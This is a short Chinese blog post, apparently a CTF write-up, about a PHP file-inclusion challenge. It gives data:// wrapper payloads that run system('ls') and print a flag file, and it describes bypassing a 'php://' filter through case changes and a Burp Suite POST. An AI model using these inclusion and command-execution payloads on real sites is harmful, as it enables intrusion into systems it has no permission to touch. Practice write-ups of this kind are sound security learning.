博客讲述了在遇到PHP安全过滤时,如何使用data伪协议和大小写绕过策略来构造payload,例如通过`<?system('ls');?>`和`<?system('cat flagisisish3r3.php');?>`来获取系统信息和文件内容。此外,还提到了利用Burp Suite进行抓包解决此类问题的方法。
首先看到如下
发现php://被过滤,可以用data伪协议,构造一个payload:
?page=data://text/plain,<?%20system(%27ls%27);?>
接着payload
?page=data://text/plain,<?%20system(%27cat%20fl4gisisish3r3.php%27);?>
然后再查看器里看到flag
这道题也可以用burp抓包来解决,由于php://过滤,可以大小写绕过,然后post
<? system('ls');?>
这里我也不知道为什么去掉php就可以,没去掉上传不了
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
